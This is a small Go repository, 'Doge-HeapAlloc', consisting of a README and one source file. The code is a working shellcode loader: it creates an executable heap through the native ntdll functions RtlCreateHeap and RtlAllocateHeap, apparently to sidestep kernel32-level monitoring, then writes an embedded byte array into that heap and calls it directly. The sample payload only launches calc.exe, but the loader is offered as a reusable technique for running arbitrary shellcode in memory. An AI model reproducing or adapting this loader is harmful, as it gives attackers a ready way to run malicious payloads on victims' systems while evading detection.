├── HeapAlloc.go
└── README.md


/HeapAlloc.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"syscall"
 5 | 	"unsafe"
 6 | )
 7 | 
 8 | var (
 9 | 	//kernel     = syscall.NewLazyDLL("kernel32.dll")
10 | 	ntdll     = syscall.NewLazyDLL("ntdll.dll")
11 | 
12 | 	//HeapCreate = kernel.NewProc("HeapCreate")
13 | 	RtlCreateHeap = ntdll.NewProc("RtlCreateHeap")
14 | 
15 | 	//HeapAlloc     = kernel.NewProc("HeapAlloc")
16 | 	RtlAllocateHeap = ntdll.NewProc("RtlAllocateHeap")
17 | 
18 | )
19 | 
20 | func allocfunc(shellSize uintptr) (uintptr, error) {
21 | 	//hhandl, _, _ := HeapCreate.Call(0x00040000, shellSize, 0)
22 | 	hhandl, _, _ := RtlCreateHeap.Call(0x00040000|0x00000002, 0, shellSize, shellSize, 0, 0)
23 | 
24 | 	//alloc, _, _ := HeapAlloc.Call(hhandl, 0x00000008, shellSize)
25 | 	alloc, _, _ := RtlAllocateHeap.Call(hhandl, 0x00000008, shellSize)
26 | 	if alloc == 0 {
27 | 		return 0, nil
28 | 	}
29 | 	return alloc, nil
30 | }
31 | 
32 | func main() {
33 | 	var shellcode = []byte{
34 | 	//calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
35 | 	0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
36 | 	0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
37 | 	0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
38 | 	0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
39 | 	0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
40 | 	0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
41 | 	0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
42 | 	0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
43 | 	0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
44 | 	0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
45 | 	0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
46 | 	0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
47 | 	0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
48 | 	0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
49 | 	0xd7,
50 | 	}
51 | 
52 | 	baseA, _ := allocfunc(uintptr(len(shellcode)))
53 | 
54 | 	WriteMemory(shellcode,baseA)
55 | 
56 | /*
57 | 
58 | 	basePtr := (*[990000]byte)(unsafe.Pointer(baseA))
59 | 
60 | 	for i, byte0 := range shellcode {
61 | 		basePtr[i] = byte0
62 | 	}
63 | 
64 |  */
65 | 
66 | 	syscall.Syscall(baseA, 0, 0, 0, 0)
67 | }
68 | 
69 | 
70 | func WriteMemory(inbuf []byte, destination uintptr) {
71 | 	for index := uint32(0); index < uint32(len(inbuf)); index++ {
72 | 		writePtr := unsafe.Pointer(destination + uintptr(index))
73 | 		v := (*byte)(writePtr)
74 | 		*v = inbuf[index]
75 | 	}
76 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Doge-HeapAlloc
2 | 
3 | Use HeapAlloc to execute shellcode.
4 | 


--------------------------------------------------------------------------------